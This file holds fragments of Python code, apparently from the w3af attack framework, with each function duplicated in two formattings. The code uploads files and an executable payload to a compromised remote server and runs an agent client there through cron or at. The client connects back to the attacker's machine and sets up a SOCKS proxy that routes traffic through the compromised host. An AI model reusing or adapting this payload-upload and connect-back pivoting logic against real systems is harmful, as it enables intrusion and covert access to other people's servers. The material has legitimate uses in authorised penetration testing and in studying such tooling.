def write(self, remote_filename, file_content): ''' Write a the contents of the parameter "file_content" to the "remote_filename" file in the remote filesystem. :param remote_filename: The filename where to write the file_content :param file_content: The string to write in the remote file :return: The message to show to the user. ''' if not self._transfer_handler: # Get the fastest transfer method ptf = payload_transfer_factory(self.execute) self._transfer_handler = ptf.get_transfer_handler() if not self._transfer_handler.can_transfer(): return 'Failed to transfer, the transfer handler failed.' else: estimatedTime = self._transfer_handler.estimate_transfer_time( len(file_content)) om.out.debug('The file transfer will take "' + str(estimatedTime) + '" seconds.') self._transfer_handler.transfer(file_content, remote_filename) om.out.debug('Finished file transfer.') return 'File upload was successful.'
def write(self, remote_filename, file_content): ''' Write a the contents of the parameter "file_content" to the "remote_filename" file in the remote filesystem. :param remote_filename: The filename where to write the file_content :param file_content: The string to write in the remote file :return: The message to show to the user. ''' if not self._transfer_handler: # Get the fastest transfer method ptf = payload_transfer_factory(self.execute) self._transfer_handler = ptf.get_transfer_handler() if not self._transfer_handler.can_transfer(): return 'Failed to transfer, the transfer handler failed.' else: estimatedTime = self._transfer_handler.estimate_transfer_time( len(file_content)) om.out.debug('The file transfer will take "' + str( estimatedTime) + '" seconds.') self._transfer_handler.transfer(file_content, remote_filename) om.out.debug('Finished file transfer.') return 'File upload was successful.'
def _send_exe_to_server(self, exe_file): ''' This method should be implemented according to the remote operating system. The idea here is to send the exe_file to the remote server and save it in a file. :param exe_file: The local path to the executable file :return: The name of the remote file that was uploaded. ''' om.out.debug('Called _send_exe_to_server()') om.out.console( 'Wait while w3af uploads the payload to the remote server...') ptf = payload_transfer_factory(self._exec_method) # Now we get the transfer handler wait_time_for_extrusion_scan = ptf.estimate_transfer_time() transferHandler = ptf.get_transfer_handler() if not transferHandler.can_transfer(): raise w3afException('Can\'t transfer the file to remote host, can_transfer() returned False.') else: om.out.debug( 'The transferHandler can upload files to the remote end.') estimatedTime = transferHandler.estimate_transfer_time( len(exe_file)) om.out.debug('The payload transfer will take "' + str(estimatedTime) + '" seconds.') self._remote_filename = get_remote_temp_file(self._exec_method) om.out.debug('Starting payload upload, remote filename is: "' + self._remote_filename + '".') if transferHandler.transfer(file(exe_file).read(), self._remote_filename): om.out.console( 'Finished payload upload to "%s"' % self._remote_filename) return self._remote_filename else: raise w3afException( 'The payload upload failed, remote md5sum is different.')
def run(self): ''' Entry point for the whole process. ''' # First, I have to check if I have a good w3afAgentClient to send to the # other end... try: interpreter, client_code, extension = self._select_client() except w3afException: om.out.error( 'Failed to find a suitable w3afAgentClient for the remote server.' ) else: # # Get a port to use. Extrusion scan or any other method is applied here. # inbound_port = self._get_inbound_port() # # Start the w3afAgentServer on this machine # agent_server = w3afAgentServer(self._ip_address, socks_port=self._socks_port, listen_port=inbound_port) self._agent_server = agent_server agent_server.start() # Wait for it to start. time.sleep(0.5) if not agent_server.is_running(): om.out.error(agent_server.get_error()) else: # # Now that everything is setup here, transfer the client # to the remote end and run it. # ptf = payload_transfer_factory(self._exec_method) transferHandler = ptf.get_transfer_handler(inbound_port) if not transferHandler.can_transfer(): raise w3afException( 'Can\'t transfer w3afAgent client to remote host, can_transfer() returned False.' ) else: # Let the user know how much time it will take to transfer the file estimatedTime = transferHandler.estimate_transfer_time( len(client_code)) om.out.debug('The w3afAgent client transfer will take "' + str(estimatedTime) + '" seconds.') filename = get_remote_temp_file(self._exec_method) filename += '.' + extension # Upload the file and check integrity om.out.console( 'Starting w3afAgent client upload, remote filename is: "%s" ...' % filename) upload_success = transferHandler.transfer( client_code, filename) if not upload_success: raise w3afException( 'The w3afAgent client failed to upload. Remote file hash does NOT match.' ) om.out.console('Finished w3afAgent client upload!') # And now start the w3afAgentClient on the remote server using cron / at self._delayedExecution(interpreter + ' ' + filename + ' ' + self._ip_address + ' ' + str(inbound_port)) # # This checks if the remote server connected back to the agent_server # if not agent_server.is_working(): om.out.console( 'Something went wrong, the w3afAgent client failed to connect back.' ) else: msg = 'A SOCKS proxy is listening on %s:%s' % ( self._ip_address, self._socks_port) msg += ' , all connections made through this daemon will be routed ' msg += ' through the compromised server. We recommend using the proxychains tool ' msg += ' ("apt-get install proxychains") to route connections through the proxy, the ' msg += ' proxy configuration should look like "socks4 %s %s"' % ( self._ip_address, self._socks_port) om.out.console(msg)
def run(self): ''' Entry point for the whole process. ''' # First, I have to check if I have a good w3afAgentClient to send to the # other end... try: interpreter, client_code, extension = self._select_client() except w3afException: om.out.error('Failed to find a suitable w3afAgentClient for the remote server.') else: # # Get a port to use. Extrusion scan or any other method is applied here. # inbound_port = self._get_inbound_port() # # Start the w3afAgentServer on this machine # agent_server = w3afAgentServer(self._ip_address, socks_port=self._socks_port, listen_port=inbound_port) self._agent_server = agent_server agent_server.start() # Wait for it to start. time.sleep(0.5) if not agent_server.is_running(): om.out.error(agent_server.get_error()) else: # # Now that everything is setup here, transfer the client # to the remote end and run it. # ptf = payload_transfer_factory(self._exec_method) transferHandler = ptf.get_transfer_handler(inbound_port) if not transferHandler.can_transfer(): raise w3afException('Can\'t transfer w3afAgent client to remote host, can_transfer() returned False.') else: # Let the user know how much time it will take to transfer the file estimatedTime = transferHandler.estimate_transfer_time( len(client_code)) om.out.debug('The w3afAgent client transfer will take "' + str(estimatedTime) + '" seconds.') filename = get_remote_temp_file(self._exec_method) filename += '.' + extension # Upload the file and check integrity om.out.console('Starting w3afAgent client upload, remote filename is: "%s" ...' % filename) upload_success = transferHandler.transfer( client_code, filename) if not upload_success: raise w3afException('The w3afAgent client failed to upload. Remote file hash does NOT match.') om.out.console('Finished w3afAgent client upload!') # And now start the w3afAgentClient on the remote server using cron / at self._delayedExecution(interpreter + ' ' + filename + ' ' + self._ip_address + ' ' + str(inbound_port)) # # This checks if the remote server connected back to the agent_server # if not agent_server.is_working(): om.out.console('Something went wrong, the w3afAgent client failed to connect back.') else: msg = 'A SOCKS proxy is listening on %s:%s' % ( self._ip_address, self._socks_port) msg += ' , all connections made through this daemon will be routed ' msg += ' through the compromised server. We recommend using the proxychains tool ' msg += ' ("apt-get install proxychains") to route connections through the proxy, the ' msg += ' proxy configuration should look like "socks4 %s %s"' % (self._ip_address, self._socks_port) om.out.console(msg)